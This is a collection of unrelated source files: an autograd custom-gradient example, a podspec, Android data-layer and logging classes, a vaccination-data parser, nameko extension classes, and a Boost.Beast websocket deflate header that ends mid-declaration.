"""This example shows how to define the gradient of your own functions.
This can be useful for speed, numerical stability, or in cases where
your code depends on external library calls."""
from __future__ import absolute_import
from __future__ import print_function
import autograd.numpy as np
import autograd.numpy.random as npr
from autograd import grad
from autograd.extend import primitive, defvjp
from autograd.test_util import check_grads
# @primitive tells Autograd not to look inside this function, but instead
# to treat it as a black box, whose gradient might be specified later.
# Functions with this decorator can contain anything that Python knows
# how to execute, and you can do things like in-place operations on arrays.
@primitive
def logsumexp(x):
    """Numerically stable log(sum(exp(x))), also defined in scipy.special"""
    # Shift by the maximum so the largest exponent is exp(0) == 1,
    # avoiding overflow for large inputs.
    shift = np.max(x)
    return shift + np.log(np.sum(np.exp(x - shift)))
# Next, we write a function that specifies the gradient with a closure.
# The reason for the closure is so that the gradient can depend
# on both the input to the original function (x), and the output of the
# original function (ans).
def logsumexp_vjp(ans, x):
    """Build the vector-Jacobian product function for ``logsumexp``.

    ``ans`` is the output of the original call and ``x`` its input.  The
    returned function maps ``g`` (the gradient of the objective w.r.t.
    ``ans``) to the gradient w.r.t. ``x``, using the identity
    d(logsumexp)/dx = exp(x - logsumexp(x)) (i.e. softmax(x)).

    To support higher-order derivatives, everything inside the returned
    function must itself be differentiable by Autograd.  Note that the
    closure necessarily keeps references to both ``x`` and ``ans``, since
    the Jacobian of logsumexp depends on them.
    """
    shape = x.shape

    def vjp(g):
        # Broadcast g and ans up to x's shape, then weight by softmax(x).
        return np.full(shape, g) * np.exp(x - np.full(shape, ans))

    return vjp
# Now we tell Autograd that logsumexp has a gradient-making function.
defvjp(logsumexp, logsumexp_vjp)
if __name__ == '__main__':
    # Now we can use logsumexp() inside a larger function that we want
    # to differentiate.
    def example_func(y):
        z = y**2
        lse = logsumexp(z)
        return np.sum(lse)

    grad_of_example = grad(example_func)
    print("Gradient: \n", grad_of_example(npr.randn(10)))

    # Check the gradients numerically, just to be safe.  Only reverse mode
    # is checked because only a VJP (reverse-mode rule) was defined above.
    check_grads(example_func, modes=['rev'])(npr.randn(10))
| 750
|
5,169
|
{
"name": "EasyIAPs",
"version": "0.1.2",
"platforms": {
"ios": "9.0"
},
"license": "MIT",
"summary": "Helping you to manage your In App Purchases easily.",
"homepage": "https://github.com/alvinvarghese/EasyIAPs",
"authors": {
"<NAME>": "<EMAIL>"
},
"source": {
"git": "https://github.com/alvinvarghese/EasyIAPs.git",
"tag": "0.1.2"
},
"description": "This library provides a an easy way to manage In App Purchases in your iOS app",
"frameworks": [
"UIKit",
"Foundation",
"StoreKit",
"QuartzCore"
],
"social_media_url": "https://twitter.com/aalvinv",
"source_files": "EasyIAPs/**/*.{swift}",
"dependencies": {
"SVProgressHUD": [
]
}
}
| 306
|
1,220
|
<filename>appshared/src/main/java/io/reark/rxgithubapp/shared/data/DataLayerBase.java
/*
* The MIT License
*
* Copyright (c) 2013-2016 reark project contributors
*
* https://github.com/reark/reark/graphs/contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package io.reark.rxgithubapp.shared.data;
import android.support.annotation.NonNull;
import io.reark.reark.data.stores.interfaces.StoreInterface;
import io.reark.reark.pojo.NetworkRequestStatus;
import io.reark.rxgithubapp.shared.pojo.GitHubRepository;
import io.reark.rxgithubapp.shared.pojo.GitHubRepositorySearch;
import static io.reark.reark.utils.Preconditions.get;
/**
 * Base class for data layers, holding the stores shared by all of them:
 * network request statuses, GitHub repositories, and repository searches.
 */
public abstract class DataLayerBase {

    // Tracks the status of in-flight network requests, keyed by request id.
    @NonNull
    protected final StoreInterface<Integer, NetworkRequestStatus, NetworkRequestStatus> networkRequestStatusStore;

    // Caches fetched GitHub repositories, keyed by repository id.
    @NonNull
    protected final StoreInterface<Integer, GitHubRepository, GitHubRepository> gitHubRepositoryStore;

    // Caches search results, keyed by the search string.
    @NonNull
    protected final StoreInterface<String, GitHubRepositorySearch, GitHubRepositorySearch> gitHubRepositorySearchStore;

    /**
     * @throws NullPointerException if any store is null ({@code get} is a
     *         non-null precondition check).
     */
    protected DataLayerBase(@NonNull final StoreInterface<Integer, NetworkRequestStatus, NetworkRequestStatus> networkRequestStatusStore,
                            @NonNull final StoreInterface<Integer, GitHubRepository, GitHubRepository> gitHubRepositoryStore,
                            @NonNull final StoreInterface<String, GitHubRepositorySearch, GitHubRepositorySearch> gitHubRepositorySearchStore) {
        this.networkRequestStatusStore = get(networkRequestStatusStore);
        this.gitHubRepositoryStore = get(gitHubRepositoryStore);
        this.gitHubRepositorySearchStore = get(gitHubRepositorySearchStore);
    }
}
| 803
|
609
|
<gh_stars>100-1000
/* Header guard: identifiers beginning with two underscores are reserved for
 * the implementation (C11 7.1.3), so the original ____IPV4_H guard name is
 * replaced with a conforming one. */
#ifndef IPV4_H_
#define IPV4_H_
/* ipv4.h */
#endif
| 63
|
345
|
<reponame>xreminded/FakeGps3
package tiger.radio.loggerlibrary;
import android.support.v4.app.FragmentTransaction;
import android.util.Log;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.util.logging.FileHandler;
import java.util.logging.Handler;
import java.util.logging.Level;
import java.util.logging.LogRecord;
import java.util.logging.Logger;
/**
 * File-backed logger that mirrors the android.util.Log API, writing records
 * through java.util.logging into a set of rotated files, and supporting
 * dumping the most recent files into a {@link PrintWriter}.
 */
public class LogFile {

    private static final String TAG = "LogFile";
    private static final boolean LOGV = true;

    /** Maximum size in bytes of a single rotated log file. */
    public static final int LOG_FILE_MAX_SIZE = 2 * 1024 * 1024;

    /** Maximum number of rotated log files kept on disk. */
    public static final int LOG_FILE_MAX_COUNT = 10;

    /**
     * Buffer size used when copying a log file into the dump writer.
     * Replaces the decompiler artifact FragmentTransaction.TRANSIT_EXIT_MASK
     * (same value, 8192) used by the original code.
     */
    private static final int DUMP_BUFFER_SIZE = 8192;

    private File mLogDir;
    private String mLogFileName;
    private Logger mLogger;

    /**
     * Creates a file-backed logger writing to {@code dir/fileName}.
     *
     * @param name     name of the underlying {@link Logger}
     * @param dir      existing directory to write log files into
     * @param fileName base name of the rotated log files
     * @throws IllegalArgumentException if {@code dir} is null or does not
     *         exist, or {@code fileName} is null
     */
    public LogFile(String name, File dir, String fileName) {
        if (dir == null || !dir.exists() || fileName == null) {
            Log.w(TAG, "Invalid configuration provided");
            throw new IllegalArgumentException();
        }
        this.mLogDir = dir;
        this.mLogFileName = fileName;
        File path = new File(this.mLogDir, this.mLogFileName);
        this.mLogger = Logger.getLogger(name);
        try {
            Handler handler = new FileHandler(
                    path.getAbsolutePath(), LOG_FILE_MAX_SIZE, LOG_FILE_MAX_COUNT, true);
            if (LOGV) {
                Log.d(TAG, "path=" + path.getAbsolutePath());
            }
            handler.setFormatter(new CustomFormatter());
            this.mLogger.setUseParentHandlers(false);
            this.mLogger.addHandler(handler);
            this.mLogger.setLevel(Level.ALL);
        } catch (IOException e) {
            // Logger stays usable but without the file handler attached.
            Log.e(TAG, "Exception: ", e);
        }
    }

    public void v(String tag, String msg) {
        log(Level.FINEST, tag, msg);
    }

    public void v(String tag, String msg, Throwable t) {
        // NOTE(review): only this overload also echoes to logcat; kept as-is
        // for behavioral compatibility with the original implementation.
        Log.v(tag, msg, t);
        log(Level.FINEST, tag, msg, t);
    }

    public void d(String tag, String msg) {
        log(Level.FINE, tag, msg);
    }

    public void d(String tag, String msg, Throwable t) {
        log(Level.FINE, tag, msg, t);
    }

    public void i(String tag, String msg) {
        log(Level.INFO, tag, msg);
    }

    public void i(String tag, String msg, Throwable t) {
        log(Level.INFO, tag, msg, t);
    }

    public void w(String tag, String msg) {
        log(Level.WARNING, tag, msg);
    }

    public void w(String tag, String msg, Throwable t) {
        log(Level.WARNING, tag, msg, t);
    }

    public void e(String tag, String msg) {
        log(Level.SEVERE, tag, msg);
    }

    public void e(String tag, String msg, Throwable t) {
        log(Level.SEVERE, tag, msg, t);
    }

    public void wtf(String tag, String msg) {
        log(Level.SEVERE, tag, msg);
    }

    public void wtf(String tag, String msg, Throwable t) {
        log(Level.SEVERE, tag, msg, t);
    }

    public void f(String tag, String msg) {
        log(Level.INFO, tag, msg);
    }

    public void f(String tag, String msg, Throwable t) {
        log(Level.INFO, tag, msg, t);
    }

    private synchronized void log(Level level, String tag, String msg) {
        log(level, tag, msg, null);
    }

    private synchronized void log(Level level, String tag, String msg, Throwable t) {
        if (this.mLogger == null) {
            Log.w(TAG, "File logger not configured");
            return;
        }
        // Build a fresh record per call instead of mutating a shared instance:
        // a LogRecord should not be reused once handed to a Handler.
        LogRecord record = new LogRecord(level, String.format("%s: %s", tag, msg));
        record.setMillis(System.currentTimeMillis());
        record.setThrown(t);
        this.mLogger.log(record);
    }

    /**
     * Writes the contents of the two most recent rotated log files
     * (suffixes ".0" and ".1") into {@code writer}.
     */
    public synchronized void dump(PrintWriter writer) {
        if (this.mLogDir == null || this.mLogFileName == null) {
            Log.w(TAG, "The file or directory of the log file is unknown");
            return;
        }
        for (int i = 0; i < 2; i++) {
            File f = new File(this.mLogDir, this.mLogFileName + "." + i);
            if (f.exists()) {
                dumpLogFile(f, writer);
            }
        }
    }

    // Copies one log file into the writer, preceded by a small header.
    private void dumpLogFile(File file, PrintWriter writer) {
        writer.println();
        writer.println(file.getName() + ":");
        writer.println();
        // try-with-resources replaces the original hand-rolled close logic,
        // which silently swallowed Throwable and could leak the reader.
        try (FileReader reader = new FileReader(file)) {
            char[] buf = new char[DUMP_BUFFER_SIZE];
            int read;
            while ((read = reader.read(buf)) != -1) {
                writer.write(buf, 0, read);
            }
        } catch (IOException e) {
            Log.w(TAG, "Exception: ", e);
        }
    }
}
| 2,738
|
1,936
|
#ifndef POSEGRAPH_EXAMPLE_VERTEX_H_
#define POSEGRAPH_EXAMPLE_VERTEX_H_
#include <unordered_set>
#include <maplab-common/pose_types.h>
#include <posegraph/vertex.h>
namespace pose_graph {
namespace example {
// Concrete example vertex that stores its incident edges in two hash sets,
// one for incoming and one for outgoing edge ids.
class Vertex : public pose_graph::Vertex {
 public:
  // Creates a vertex with the given id and no incident edges.
  explicit Vertex(const VertexId& id);
  virtual ~Vertex();
  virtual const VertexId& id() const;
  // Return false if the edge could not be added (e.g. already present --
  // TODO confirm against the .cc implementation, not visible here).
  virtual bool addIncomingEdge(const EdgeId& edge);
  virtual bool addOutgoingEdge(const EdgeId& edge);
  // Copies the edge ids into the caller-provided set.
  virtual void getOutgoingEdges(std::unordered_set<EdgeId>* edges) const;
  virtual void getIncomingEdges(std::unordered_set<EdgeId>* edges) const;
  virtual bool hasIncomingEdges() const;
  virtual bool hasOutgoingEdges() const;
  EIGEN_MAKE_ALIGNED_OPERATOR_NEW

 private:
  virtual void removeIncomingEdge(const pose_graph::EdgeId& edge_id);
  virtual void removeOutgoingEdge(const pose_graph::EdgeId& edge_id);
  VertexId id_;
  std::unordered_set<EdgeId> incoming_;
  std::unordered_set<EdgeId> outgoing_;
};
} // namespace example
} // namespace pose_graph
#endif // POSEGRAPH_EXAMPLE_VERTEX_H_
| 378
|
430
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Dict
from pandas import DataFrame, concat
from lib.cast import safe_int_cast
from lib.data_source import DataSource
from lib.utils import table_rename
from pipelines.epidemiology.de_authority import _SUBREGION1_CODE_MAP
# Maps source spreadsheet column names to the canonical output schema.
# NOTE(review): several "Total ..." source columns are mapped to "new_..."
# output names (e.g. "Total First Dose BioNTech" -> "new_persons_vaccinated_pfizer");
# verify against the upstream sheet whether those columns are cumulative or daily.
_column_adapter = {
    "Date": "date",
    "RS": "subregion1_code",
    "New number vaccinated at least once": "new_persons_vaccinated",
    "New Fully Vaccinated": "new_persons_fully_vaccinated",
    "New Vaccinations": "new_vaccine_doses_administered",
    "Total number vaccinated at least once": "total_persons_vaccinated",
    "Total Fully Vaccinated": "total_persons_fully_vaccinated",
    "Total Vaccinations": "total_vaccine_doses_administered",
    "Total First Dose BioNTech": "new_persons_vaccinated_pfizer",
    "Total Second Dose BioNTech": "total_persons_fully_vaccinated_pfizer",
    "Total First Dose Moderna": "new_persons_vaccinated_moderna",
    "Total Second Dose Moderna": "total_persons_fully_vaccinated_moderna",
    "Total First Dose AstraZeneca": "new_persons_vaccinated_astrazeneca",
    "Total Second Dose AstraZeneca": "total_persons_fully_vaccinated_astrazeneca",
    "Total First Dose Janssen": "new_persons_vaccinated_janssen",
    "Total Second Dose Janssen": "total_persons_fully_vaccinated_janssen",
}
class FinMangoGermanyDataSource(DataSource):
    """Parses the FinMango vaccination spreadsheet for Germany."""

    def parse_dataframes(
        self, dataframes: Dict[Any, DataFrame], aux: Dict[str, DataFrame], **parse_opts
    ) -> DataFrame:
        # Stack all sheets into one table and map columns to our schema.
        combined = concat(dataframes[0].values())
        data = table_rename(combined, _column_adapter, drop=True)

        # Discard records missing a date or a location.
        data = data.dropna(subset=["date", "subregion1_code"])

        # Coerce every value column (all columns after date + region) to int.
        for column in data.columns[2:]:
            data[column] = data[column].apply(safe_int_cast)

        # Translate region codes to their ISO equivalents.
        data["subregion1_code"] = data["subregion1_code"].apply(_SUBREGION1_CODE_MAP.get)

        # Rows without a region code carry country-level totals.
        country_mask = data["subregion1_code"].isna()
        data["key"] = None
        data.loc[country_mask, "key"] = "DE"
        data.loc[~country_mask, "key"] = "DE_" + data["subregion1_code"]
        return data
| 984
|
3,425
|
from __future__ import absolute_import
import inspect
import types
import warnings
import weakref
from functools import partial
from logging import getLogger
from eventlet.event import Event
from nameko.exceptions import IncorrectSignature
_log = getLogger(__name__)
ENTRYPOINT_EXTENSIONS_ATTR = 'nameko_entrypoints'
class Extension(object):
    """ Note that Extension.__init__ is called during :meth:`bind` as
    well as at instantiation time, so avoid side-effects in this method.
    Use :meth:`setup` instead.
    Furthermore, :meth:`bind` and :func:`iter_extensions` use introspection
    to find any subextensions that an extension may declare. Any descriptors
    on the extension should expect to be called during introspection, which
    happens between `ServiceContainer.__init__` and `ServiceContainer.setup`.
    :attr:`Extension.container` gives access to the
    :class:`~nameko.containers.ServiceContainer` instance to
    which the Extension is bound, otherwise `None`.
    """

    # Constructor arguments captured by __new__, replayed by bind() to clone
    # the prototype (name-mangled to _Extension__params).
    __params = None
    container = None

    def __new__(cls, *args, **kwargs):
        # Record the constructor arguments so bind() can re-instantiate this
        # extension with identical configuration.
        inst = super(Extension, cls).__new__(cls)
        inst.__params = (args, kwargs)
        return inst

    def setup(self):
        """ Called on bound Extensions before the container starts.
        Extensions should do any required initialisation here.
        """

    def start(self):
        """ Called on bound Extensions when the container has successfully
        started.
        This is only called after all other Extensions have successfully
        returned from :meth:`Extension.setup`. If the Extension reacts
        to external events, it should now start acting upon them.
        """

    def stop(self):
        """ Called when the service container begins to shut down.
        Extensions should do any graceful shutdown here.
        """

    def kill(self):
        """ Called to stop this extension without grace.
        Extensions should urgently shut down here. This means
        stopping as soon as possible by omitting cleanup.
        This may be distinct from ``stop()`` for certain dependencies.
        For example, :class:`~messaging.QueueConsumer` tracks messages being
        processed and pending message acks. Its ``kill`` implementation
        discards these and disconnects from rabbit as soon as possible.
        Extensions should not raise during kill, since the container
        is already dying. Instead they should log what is appropriate and
        swallow the exception to allow the container kill to continue.
        """

    def bind(self, container):
        """ Get an instance of this Extension to bind to `container`.

        The prototype (self) is never bound itself; a fresh clone is created
        from the captured constructor arguments, and the same is done
        recursively for any sub-extensions found by introspection.
        """
        def clone(prototype):
            if prototype.is_bound():
                raise RuntimeError('Cannot `bind` a bound extension.')
            cls = type(prototype)
            args, kwargs = prototype.__params
            instance = cls(*args, **kwargs)
            # instance.container must be a weakref to avoid a strong reference
            # from value to key in the `shared_extensions` weakkey dict
            # see test_extension_sharing.py: test_weakref
            instance.container = weakref.proxy(container)
            return instance

        instance = clone(self)

        # recurse over sub-extensions
        for name, ext in inspect.getmembers(self, is_extension):
            setattr(instance, name, ext.bind(container))
        return instance

    def is_bound(self):
        # Bound extensions have a (weakref proxy to a) container attached.
        return self.container is not None

    def __repr__(self):
        if not self.is_bound():
            return '<{} [unbound] at 0x{:x}>'.format(
                type(self).__name__, id(self))

        return '<{} at 0x{:x}>'.format(
            type(self).__name__, id(self))
class SharedExtension(Extension):
    """Extension whose bound instance is shared: all declarations with the
    same :attr:`sharing_key` on a container bind to a single instance.
    """

    @property
    def sharing_key(self):
        # By default, one shared instance per concrete extension class.
        return type(self)

    def bind(self, container):
        """ Bind implementation that supports sharing.

        Reuses an already-bound instance with the same sharing key if one
        exists on the container; otherwise binds a new one and records it.
        """
        existing = container.shared_extensions.get(self.sharing_key)
        if existing:
            return existing

        bound = super(SharedExtension, self).bind(container)
        container.shared_extensions[self.sharing_key] = bound
        return bound
class DependencyProvider(Extension):
    """Extension that injects a dependency into service workers and observes
    the worker lifecycle (setup, result, teardown).
    """

    # Name of the service-class attribute this provider was declared under;
    # set by bind().
    attr_name = None

    def bind(self, container, attr_name):
        """ Get an instance of this Dependency to bind to `container` with
        `attr_name`.
        """
        instance = super(DependencyProvider, self).bind(container)
        instance.attr_name = attr_name
        # NOTE(review): the prototype's attr_name is also mutated here, not
        # only the bound clone's -- confirm whether this is intentional.
        self.attr_name = attr_name
        return instance

    def get_dependency(self, worker_ctx):
        """ Called before worker execution. A DependencyProvider should return
        an object to be injected into the worker instance by the container.
        """

    def worker_result(self, worker_ctx, result=None, exc_info=None):
        """ Called with the result of a service worker execution.
        Dependencies that need to process the result should do it here.
        This method is called for all `Dependency` instances on completion
        of any worker.
        Example: a database session dependency may flush the transaction
        :Parameters:
            worker_ctx : WorkerContext
                See ``nameko.containers.ServiceContainer.spawn_worker``
        """

    def worker_setup(self, worker_ctx):
        """ Called before a service worker executes a task.
        Dependencies should do any pre-processing here, raising exceptions
        in the event of failure.
        Example: ...
        :Parameters:
            worker_ctx : WorkerContext
                See ``nameko.containers.ServiceContainer.spawn_worker``
        """

    def worker_teardown(self, worker_ctx):
        """ Called after a service worker has executed a task.
        Dependencies should do any post-processing here, raising
        exceptions in the event of failure.
        Example: a database session dependency may commit the session
        :Parameters:
            worker_ctx : WorkerContext
                See ``nameko.containers.ServiceContainer.spawn_worker``
        """

    def __repr__(self):
        if not self.is_bound():
            return '<{} [unbound] at 0x{:x}>'.format(
                type(self).__name__, id(self))

        service_name = self.container.service_name
        return '<{} [{}.{}] at 0x{:x}>'.format(
            type(self).__name__, service_name, self.attr_name, id(self))
class ProviderCollector(object):
    """Mixin that tracks registered providers and can block shutdown until
    every registered provider has unregistered again.
    """

    def __init__(self, *args, **kwargs):
        self._providers = set()
        # Stays True forever once any provider has registered; used by
        # wait_for_providers() to decide whether waiting is needed at all.
        self._providers_registered = False
        self._last_provider_unregistered = Event()
        super(ProviderCollector, self).__init__(*args, **kwargs)

    def register_provider(self, provider):
        self._providers_registered = True
        _log.debug('registering provider %s for %s', provider, self)
        self._providers.add(provider)

    def unregister_provider(self, provider):
        # Unknown providers are ignored silently.
        if provider not in self._providers:
            return
        _log.debug('unregistering provider %s for %s', provider, self)
        self._providers.remove(provider)
        if not self._providers:
            _log.debug('last provider unregistered for %s', self)
            self._last_provider_unregistered.send()

    def wait_for_providers(self):
        """ Wait for any providers registered with the collector to have
        unregistered.
        Returns immediately if no providers were ever registered.
        """
        if self._providers_registered:
            _log.debug('waiting for providers to unregister %s', self)
            self._last_provider_unregistered.wait()
            _log.debug('all providers unregistered %s', self)

    def stop(self):
        """ Default `:meth:Extension.stop()` implementation for
        subclasses using `ProviderCollector` as a mixin.
        """
        self.wait_for_providers()
def register_entrypoint(fn, entrypoint):
    """Attach `entrypoint` to the set of entrypoint descriptors stored on
    `fn`, creating the set on first use.
    """
    if not hasattr(fn, ENTRYPOINT_EXTENSIONS_ATTR):
        setattr(fn, ENTRYPOINT_EXTENSIONS_ATTR, set())
    getattr(fn, ENTRYPOINT_EXTENSIONS_ATTR).add(entrypoint)
class Entrypoint(Extension):
    """Extension that fires service workers in response to external events.
    Declared on service methods via :meth:`decorator`.
    """

    # Name of the decorated service method; set by bind().
    method_name = None

    def __init__(
        self, expected_exceptions=(), sensitive_arguments=(), **kwargs
    ):
        """
        :Parameters:
            expected_exceptions : exception class or tuple of exception classes
                Specify exceptions that may be caused by the caller (e.g. by
                providing bad arguments). Saved on the entrypoint instance as
                ``entrypoint.expected_exceptions`` for later inspection by
                other extensions, for example a monitoring system.
            sensitive_arguments : string or tuple of strings
                Mark an argument or part of an argument as sensitive. Saved on
                the entrypoint instance as ``entrypoint.sensitive_arguments``
                for later inspection by other extensions, for example a
                logging system.
        :seealso: :func:`nameko.utils.get_redacted_args`
        """
        # backwards compat: accept the old `sensitive_variables` kwarg but
        # warn that it is deprecated.
        sensitive_variables = kwargs.pop('sensitive_variables', ())
        if sensitive_variables:
            sensitive_arguments = sensitive_variables
            warnings.warn(
                "The `sensitive_variables` argument has been renamed to "
                "`sensitive_arguments`. This warning will be removed in "
                "version 2.9.0.", DeprecationWarning)

        self.expected_exceptions = expected_exceptions
        self.sensitive_arguments = sensitive_arguments
        super(Entrypoint, self).__init__(**kwargs)

    def bind(self, container, method_name):
        """ Get an instance of this Entrypoint to bind to `container` with
        `method_name`.
        """
        instance = super(Entrypoint, self).bind(container)
        instance.method_name = method_name
        return instance

    def check_signature(self, args, kwargs):
        """Verify that `args`/`kwargs` match the decorated method's signature,
        raising :class:`IncorrectSignature` otherwise.
        """
        service_cls = self.container.service_cls
        fn = getattr(service_cls, self.method_name)
        try:
            service_instance = None  # fn is unbound
            inspect.getcallargs(fn, service_instance, *args, **kwargs)
        except TypeError as exc:
            raise IncorrectSignature(str(exc))

    @classmethod
    def decorator(cls, *args, **kwargs):
        """Use this entrypoint class as a method decorator, with or without
        arguments.
        """
        def registering_decorator(fn, args, kwargs):
            instance = cls(*args, **kwargs)
            register_entrypoint(fn, instance)
            return fn

        if len(args) == 1 and isinstance(args[0], types.FunctionType):
            # usage without arguments to the decorator:
            # @foobar
            # def spam():
            #     pass
            return registering_decorator(args[0], args=(), kwargs={})
        else:
            # usage with arguments to the decorator:
            # @foobar('shrub', ...)
            # def spam():
            #     pass
            return partial(registering_decorator, args=args, kwargs=kwargs)

    def __repr__(self):
        if not self.is_bound():
            return '<{} [unbound] at 0x{:x}>'.format(
                type(self).__name__, id(self))

        service_name = self.container.service_name
        return '<{} [{}.{}] at 0x{:x}>'.format(
            type(self).__name__, service_name, self.method_name, id(self))
def is_extension(obj):
    """ Return True if `obj` is an :class:`Extension` instance. """
    return isinstance(obj, Extension)
def is_dependency(obj):
    """ Return True if `obj` is a :class:`DependencyProvider` instance. """
    return isinstance(obj, DependencyProvider)
def is_entrypoint(obj):
    """ Return True if `obj` is an :class:`Entrypoint` instance. """
    return isinstance(obj, Entrypoint)
def iter_extensions(extension):
    """ Depth-first iterator over sub-extensions on `extension`.

    Sub-extensions are discovered as attributes via `inspect.getmembers`
    with the `is_extension` predicate; each child's own sub-extensions
    are yielded before the child itself.
    """
    for _, sub_extension in inspect.getmembers(extension, is_extension):
        yield from iter_extensions(sub_extension)
        yield sub_extension
| 4,725
|
995
|
//
// Copyright (c) 2016-2019 <NAME> (<EMAIL> at <EMAIL> dot <EMAIL>)
//
// Distributed under the Boost Software License, Version 1.0. (See accompanying
// file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
// Official repository: https://github.com/boostorg/beast
//
#ifndef BOOST_BEAST_WEBSOCKET_DETAIL_IMPL_BASE_HPP
#define BOOST_BEAST_WEBSOCKET_DETAIL_IMPL_BASE_HPP
#include <boost/beast/websocket/option.hpp>
#include <boost/beast/websocket/detail/frame.hpp>
#include <boost/beast/websocket/detail/pmd_extension.hpp>
#include <boost/beast/core/buffer_traits.hpp>
#include <boost/beast/core/role.hpp>
#include <boost/beast/http/empty_body.hpp>
#include <boost/beast/http/message.hpp>
#include <boost/beast/http/string_body.hpp>
#include <boost/beast/zlib/deflate_stream.hpp>
#include <boost/beast/zlib/inflate_stream.hpp>
#include <boost/beast/core/buffers_suffix.hpp>
#include <boost/beast/core/error.hpp>
#include <boost/beast/core/detail/clamp.hpp>
#include <boost/asio/buffer.hpp>
#include <cstdint>
#include <memory>
#include <stdexcept>
namespace boost {
namespace beast {
namespace websocket {
namespace detail {
//------------------------------------------------------------------------------
template<bool deflateSupported>
struct impl_base;
template<>
struct impl_base<true>
{
    // State information for the permessage-deflate extension
    struct pmd_type
    {
        // `true` if current read message is compressed
        bool rd_set = false;

        zlib::deflate_stream zo;    // compressor (outbound frames)
        zlib::inflate_stream zi;    // decompressor (inbound frames)
    };

    std::unique_ptr<pmd_type> pmd_;     // pmd settings or nullptr
    permessage_deflate pmd_opts_;       // local pmd options
    detail::pmd_offer pmd_config_;      // offer (client) or negotiation (server)

    // return `true` if current message is deflated
    bool
    rd_deflated() const
    {
        return pmd_ && pmd_->rd_set;
    }

    // set whether current message is deflated
    // returns `false` on protocol violation
    bool
    rd_deflated(bool rsv1)
    {
        if(pmd_)
        {
            pmd_->rd_set = rsv1;
            return true;
        }
        return ! rsv1; // pmd not negotiated
    }

    // Compress a buffer sequence
    // Returns: `true` if more calls are needed
    //
    // On return, `out` is shrunk to the bytes actually produced and
    // `total_in` holds the number of input bytes consumed from `cb`.
    template<class ConstBufferSequence>
    bool
    deflate(
        net::mutable_buffer& out,
        buffers_suffix<ConstBufferSequence>& cb,
        bool fin,
        std::size_t& total_in,
        error_code& ec)
    {
        BOOST_ASSERT(out.size() >= 6);
        auto& zo = this->pmd_->zo;
        zlib::z_params zs;
        zs.avail_in = 0;
        zs.next_in = nullptr;
        zs.avail_out = out.size();
        zs.next_out = out.data();
        // Feed each buffer of the sequence into the compressor until
        // either the input is exhausted or the output buffer fills.
        for(auto in : beast::buffers_range_ref(cb))
        {
            zs.avail_in = in.size();
            if(zs.avail_in == 0)
                continue;
            zs.next_in = in.data();
            zo.write(zs, zlib::Flush::none, ec);
            if(ec)
            {
                // need_buffers means the output filled; anything else
                // is a real error reported to the caller.
                if(ec != zlib::error::need_buffers)
                    return false;
                BOOST_ASSERT(zs.avail_out == 0);
                BOOST_ASSERT(zs.total_out == out.size());
                ec = {};
                break;
            }
            if(zs.avail_out == 0)
            {
                BOOST_ASSERT(zs.total_out == out.size());
                break;
            }
            BOOST_ASSERT(zs.avail_in == 0);
        }
        total_in = zs.total_in;
        cb.consume(zs.total_in);
        // If this is the final frame and all input was consumed,
        // flush the stream and strip the trailing flush marker.
        if(zs.avail_out > 0 && fin)
        {
            auto const remain = buffer_bytes(cb);
            if(remain == 0)
            {
                // Inspired by <NAME>
                // https://github.com/madler/zlib/issues/149
                //
                // VFALCO We could do this flush twice depending
                // on how much space is in the output.
                zo.write(zs, zlib::Flush::block, ec);
                BOOST_ASSERT(! ec || ec == zlib::error::need_buffers);
                if(ec == zlib::error::need_buffers)
                    ec = {};
                if(ec)
                    return false;
                if(zs.avail_out >= 6)
                {
                    zo.write(zs, zlib::Flush::full, ec);
                    BOOST_ASSERT(! ec);
                    // remove flush marker
                    zs.total_out -= 4;
                    out = net::buffer(out.data(), zs.total_out);
                    return false;
                }
            }
        }
        ec = {};
        out = net::buffer(out.data(), zs.total_out);
        return true;
    }

    // Reset the compressor after a message when the negotiated options
    // disallow context takeover for this role's sending direction.
    void
    do_context_takeover_write(role_type role)
    {
        if((role == role_type::client &&
            this->pmd_config_.client_no_context_takeover) ||
           (role == role_type::server &&
            this->pmd_config_.server_no_context_takeover))
        {
            this->pmd_->zo.reset();
        }
    }

    // Decompress into/from the caller-prepared z_params.
    void
    inflate(
        zlib::z_params& zs,
        zlib::Flush flush,
        error_code& ec)
    {
        pmd_->zi.write(zs, flush, ec);
    }

    // Reset the decompressor after a message when the peer's direction
    // was negotiated with no context takeover.
    void
    do_context_takeover_read(role_type role)
    {
        if((role == role_type::client &&
            pmd_config_.server_no_context_takeover) ||
           (role == role_type::server &&
            pmd_config_.client_no_context_takeover))
        {
            pmd_->zi.clear();
        }
    }

    // Append the permessage-deflate response header (defined elsewhere).
    template<class Body, class Allocator>
    void
    build_response_pmd(
        http::response<http::string_body>& res,
        http::request<Body,
            http::basic_fields<Allocator>> const& req);

    // Parse the server's permessage-deflate offer from the HTTP response.
    void
    on_response_pmd(
        http::response<http::string_body> const& res)
    {
        detail::pmd_offer offer;
        detail::pmd_read(offer, res);
        // VFALCO see if offer satisfies pmd_config_,
        //        return an error if not.
        pmd_config_ = offer; // overwrite for now
    }

    // Read the permessage-deflate configuration from request headers.
    template<class Allocator>
    void
